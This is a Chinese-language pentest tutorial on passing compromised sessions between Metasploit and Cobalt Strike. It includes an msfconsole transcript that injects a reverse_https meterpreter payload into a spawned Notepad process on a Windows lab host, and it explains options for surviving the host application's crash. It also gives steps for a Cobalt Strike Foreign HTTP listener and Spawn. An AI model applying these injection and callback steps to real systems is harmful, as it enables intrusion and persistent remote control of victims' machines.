Cobalt Strike与Metasploit会话互转

一、前言

Cobalt Strike 和 Metasploit 是渗透测试经常会用到的两个工具,Cobalt Strike 与 Metasploit在很多地方都是兼容的,所以我们便可以将 Metasploit 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit上。

二、Metasploit会话转到Cobaltstrike

1、首先通过Metasploit获取会话。
Cobalt Strike与Metasploit会话互转_第1张图片
2、开启 Cobalt Strike ,设置监听。
Cobalt Strike与Metasploit会话互转_第2张图片

3、会话互转,使用windows/local/payload_inject模块。
Cobalt Strike与Metasploit会话互转_第3张图片

详情如下。

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  1         meterpreter x86/windows  STU1\Administrator @ STU1  192.168.60.65:4444 -> 192.168.60.84:2425 (192.168.60.84)

msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf6 exploit(windows/local/payload_inject) > set lport 443
lport => 443
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true 
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set PrependMigrate true     
PrependMigrate => true
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > run

[*] Running module against STU1
[*] Spawned Notepad process 3504
[*] Injecting payload into 3504
[*] Preparing 'windows/meterpreter/reverse_https' for PID 3504
msf6 exploit(windows/local/payload_inject) > 

(1)windows/local/payload_inject 使用该模块可以将 Metasploit 获取到的会话注入到CS中。
(2)set DisablePayloadHandler true 用来禁用 Metasploit payload handler的监听,目的就是告诉 Metasploit,我们已经建立了监听器,不必再新建监听器了,避免在 Metasploit 内再起一个 handler 来服务你的 payload 连接。
(3)set PrependMigrate true 用来启用迁移进程,这个操作可以前置MSF shellcode 在另一个进程中运行,如果被利用的应用程序崩溃或被用户关闭,MSF中的会话断开,但转到CS的 Beacon 会话仍然是存活的,该选项可选。

4、如下,当在MSF中执行完如上操作之后,可能需要等待一会,就可以看到Cobalt Strike 接收到传递过来的会话了。
Cobalt Strike与Metasploit会话互转_第4张图片

三、Cobaltstrike会话转到Metasploit

1、首先获取一个Cobalt Strike会话。
Cobalt Strike与Metasploit会话互转_第5张图片
2、开启Metasploit,设置监听。
Cobalt Strike与Metasploit会话互转_第6张图片
3、开始会话互转
(1)在 Cobalt Strike 上先创建一个 Foreign HTTP 监听,IP和端口设置成上面 Metasploit 所设置 handler 模块的端口和 IP。
Cobalt Strike与Metasploit会话互转_第7张图片
(2)选择要传递的会话,点击右键,选择 Spawn(增加会话),然后再选择刚才建立的监听器。
Cobalt Strike与Metasploit会话互转_第8张图片

4、等待一会,就可以看到 Cobalt Strike 传递过来的会话了(可能等待时间较长)
Cobalt Strike与Metasploit会话互转_第9张图片

你可能感兴趣的:(安全工具,安全)